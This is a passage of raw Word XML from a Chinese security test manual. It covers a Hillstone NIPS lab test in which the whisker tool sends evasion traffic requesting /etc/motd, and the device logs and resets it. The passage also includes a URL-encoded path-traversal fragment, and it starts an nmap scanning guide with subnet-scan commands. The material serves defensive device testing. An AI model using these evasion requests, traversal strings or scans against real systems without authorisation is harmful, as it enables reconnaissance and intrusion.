%5c%2e\SLas</w:t>
      </w:r>
      <w:r>
        <w:t>H\.%5c%69%6eD%45%58%2e%70%68%70</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc496014434"/>
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="65" w:name="_Toc499884722"/>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>山石NIPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>设备</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防护案例</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="005D6E83" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc496014435"/>
      <w:r w:rsidRPr="005D6E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>1．</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6E83">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>测试环境搭建</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>测试目的和重点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>测试DUT针对</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逃逸</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>的检测行为。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>咱们</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>设备默认是支持逃逸检测的</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>所以相关配置只需要开启ips功能即可</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>组网</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>whisker</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>(192.168.3.2)—(192.168.3.1)Hillstone</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-NIPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>(10.1.1.1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--server</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>(10</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.1.1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="005D6E83" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc496014436"/>
      <w:r w:rsidRPr="005D6E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>2．</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6E83">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIPS设备</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>逃逸</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6E83">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>防护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>DUT配置步骤</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录ui，在policy中直接引用</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>IPS预定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模板</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>predef_default</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="576F02F2" wp14:editId="58D0DFC5">
            <wp:extent cx="5274310" cy="177609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776095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后续测试逃逸流量会命中该policy。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过whisker构造逃逸流量：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）随机选择设备特征库中的某个特征，根据这个特征来对whisker发送的内容进行构造。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>/*1049406*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>idp_signature 5173:http</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve">{          </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve">        signature: http_req_uri($1 &lt;&gt; /|2f|etc|2f|motd/i);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve">        port: any,[80];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>构造main.test</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>目录为/usr/local/share/whisker/main.test</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>push @{$G_HOOKS{TESTS}}, \&amp;m_evasion_test;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>sub m_evasion_test {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>        wgeneral('/','etc/motd',id=&gt;'1000');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07"/>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）组网完成后，执行main</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>.test脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>让流量经过nips设备到server</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve">whisker </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve">h 10.1.1.100 </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>I 1234567890 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>查看设备</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>发现设备成功报日志</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并reset。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve">8JRebvOj# show logging  threat </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve">2017-10-17 14:23:29, CRIT@IPS: CRITICAL! From 192.168.3.2:56240(ethernet0/3.1000) to 10.1.1.100:80(ethernet0/1), threat name: WEB /etc/motd File Download, threat type: Attack, threat subtype: Access Control, App/Protocol: HTTP, action: reset, defender: IPS, signature ID: 305173, profile: predef_default, threat severity: High, </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:t>policy id: 1, aggregation attack count 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc496014437"/>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="69" w:name="_Toc499884723"/>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NMAP测试工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc496014438"/>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="71" w:name="_Toc499884724"/>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NMAP工具安装</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>从nmap官网https://nmap.org下载安装包</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，选择下载windows二进制的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60256AF2" wp14:editId="1684B2B6">
            <wp:extent cx="5274310" cy="38627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862705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、然后按步骤点击“下一步”，直至安装完成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BC8C010" wp14:editId="5F7D1EBF">
            <wp:extent cx="5274310" cy="2333625"/>
            <wp:effectExtent l="0" t="0" r="254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33625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc496014439"/>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="73" w:name="_Toc499884725"/>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具使用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00872BF4" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc496014440"/>
      <w:r w:rsidRPr="00872BF4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1. nmap扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00872BF4" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:bookmarkStart w:id="75" w:name="_Toc496014441"/>
      <w:r w:rsidRPr="00872BF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nmap扫描参数介绍</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当用户有明确的扫描目标时，可以直接使用Nmap工具实施扫描。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据扫描目标的多少，可以分为扫描单个目标、多个目标及目标列表三种情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>常见的一些扫描参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E1165D1" wp14:editId="5C7BFA5C">
            <wp:extent cx="5274310" cy="363982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639820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B4089CB" wp14:editId="15F2F994">
            <wp:extent cx="5274310" cy="36214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621405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="255D6B86" wp14:editId="0BF2B578">
            <wp:extent cx="5274310" cy="3636645"/>
            <wp:effectExtent l="0" t="0" r="254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636645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79288280" wp14:editId="22235466">
            <wp:extent cx="5274310" cy="35883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588385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>举例：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>扫描整个子网,命令如下:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>#nmap 192.1</w:t>
      </w:r>
      <w:r>
        <w:t>68.1.1/24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>扫描多个目标,命令如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>#nmap 192.168.1.2 192.168.1.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>扫描一个范围内的目标,如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>#nmap 192.168.1.1-100 (扫描IP地址为192.168.1.1-192.168.1.100内的所有主机</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>如果你有一个ip地址列表，将这个保存为一个txt文件，和namp在同一目录下,扫描这个txt内的所有主机，命令如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>#nmap -iL target.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:t>如果你想看到你扫描的所有主机的列表，用以下命令:</w:t>
      </w:r>
    </w:p>
